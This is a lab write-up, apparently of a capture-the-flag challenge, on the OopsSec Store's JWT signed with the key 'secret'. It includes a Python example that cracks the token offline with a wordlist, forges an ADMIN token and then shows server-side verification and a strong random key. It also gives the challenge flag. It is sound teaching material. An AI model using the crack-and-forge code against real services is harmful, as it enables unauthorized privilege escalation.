
Critical JWT Vulnerability in OopsSec Store Enables Privilege Escalation via Weak Secret Key
A vulnerability in the JSON Web Token (JWT) implementation of the OopsSec Store application allowed privilege escalation through a weak signature key. Tokens were signed with HMAC-SHA256 (HS256) using the literal string "secret" as the key. HS256 is a symmetric scheme, so the verification key is also the signing key, and because a captured token's signature can be recomputed locally under any candidate key, the key was recoverable entirely offline by a dictionary or brute-force attack with tools such as Hashcat (hash mode 16500) or jwt_tool, without sending further requests to the server. After recovering the key, an attacker could re-sign a modified copy of their own token with the role claim set to ADMIN and use it to reach the /admin dashboard, bypassing its access control.

Two further weaknesses compounded the flaw: the application stored the token in the browser's localStorage, where any script running in the page can read it, and it performed permission validation on the client side, so the role claim carried by the token was trusted as-is. A key of at least 256 bits drawn from a cryptographically secure random generator would have put the key beyond reach of dictionary and brute-force attacks, and the role check belongs on the server, where the signature is verified before any claim is trusted. The flaw was exploited in a local environment (http://localhost:3000) using preconfigured test accounts. The obtained flag was OSS{w34k_jwt_s3cr3t_k3y}.
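The attack described above and the server-side check that should have stopped it, as an added Python example that is not code from the OopsSec Store application or from this write-up. It implements HS256 signing and verification directly with the standard library so it runs offline; the low-privilege token, the six-word wordlist and the claim names sub and role are constructed for the example, and the key string "secret" is the one named above. The same dictionary attack is then run against a token signed with a 256-bit random key to show why it fails there.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

# Constructed for this example: the weak key named in the write-up and a
# small wordlist standing in for a real dictionary file.
WEAK_KEY = b"secret"
WORDLIST = ["password", "123456", "jwt", "secret", "admin", "changeme"]
# A strong key: 32 bytes from the OS CSPRNG, regenerated on every run.
STRONG_KEY = secrets.token_bytes(32)


def b64url(data: bytes) -> str:
    """Base64url without padding, as RFC 7515 requires for JWS segments."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    """Reverse of b64url: restore the padding the compact form drops."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _compact_json(obj: dict) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode()


def sign_hs256(payload: dict, key: bytes) -> str:
    """Build a compact-serialised JWT: header.payload.HMAC-SHA256(header.payload)."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = b64url(_compact_json(header)) + "." + b64url(_compact_json(payload))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def crack_hs256(token: str, wordlist) -> Optional[bytes]:
    """Offline dictionary attack: recompute the MAC under each candidate key.

    Only the captured token is needed; the server is never contacted.
    """
    signing_input, _, sig_b64 = token.rpartition(".")
    target = b64url_decode(sig_b64)
    for candidate in wordlist:
        key = candidate.encode()
        guess = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return key
    return None


def forge_admin(token: str, key: bytes) -> str:
    """Re-sign a copy of an existing token with the role claim set to ADMIN."""
    payload = json.loads(b64url_decode(token.split(".")[1]))
    payload["role"] = "ADMIN"
    return sign_hs256(payload, key)


def verify_hs256(token: str, key: bytes) -> dict:
    """Server-side verification: pin the algorithm, check the MAC, then read claims."""
    try:
        h_b64, p_b64, s_b64 = token.split(".")
    except ValueError:
        raise ValueError("malformed token") from None
    header = json.loads(b64url_decode(h_b64))
    if header.get("alg") != "HS256":  # the token must never choose the algorithm
        raise ValueError("unexpected alg")
    expected = hmac.new(key, f"{h_b64}.{p_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p_b64))


def is_admin(token: str, key: bytes) -> bool:
    """The check /admin should perform on the server, not in the browser."""
    try:
        return verify_hs256(token, key).get("role") == "ADMIN"
    except ValueError:
        return False


# Constructed sample: a low-privilege token as the vulnerable app would issue it.
USER_TOKEN = sign_hs256({"sub": "alice", "role": "USER"}, WEAK_KEY)
RECOVERED_KEY = crack_hs256(USER_TOKEN, WORDLIST)
FORGED_TOKEN = forge_admin(USER_TOKEN, RECOVERED_KEY) if RECOVERED_KEY else None

# The same token signed with a 256-bit random key resists the wordlist.
STRONG_TOKEN = sign_hs256({"sub": "alice", "role": "USER"}, STRONG_KEY)

if __name__ == "__main__":
    print("recovered key:", RECOVERED_KEY)
    print("forged token accepted as ADMIN:", is_admin(FORGED_TOKEN, WEAK_KEY))
    print("dictionary attack on strong key:", crack_hs256(STRONG_TOKEN, WORDLIST))
```

verify_hs256 rejects any header whose alg is not the one the server expects, so a token that tries to downgrade the algorithm fails before its signature is even examined; with the strong key the forged token is rejected because its signature no longer matches, and the wordlist attack returns nothing.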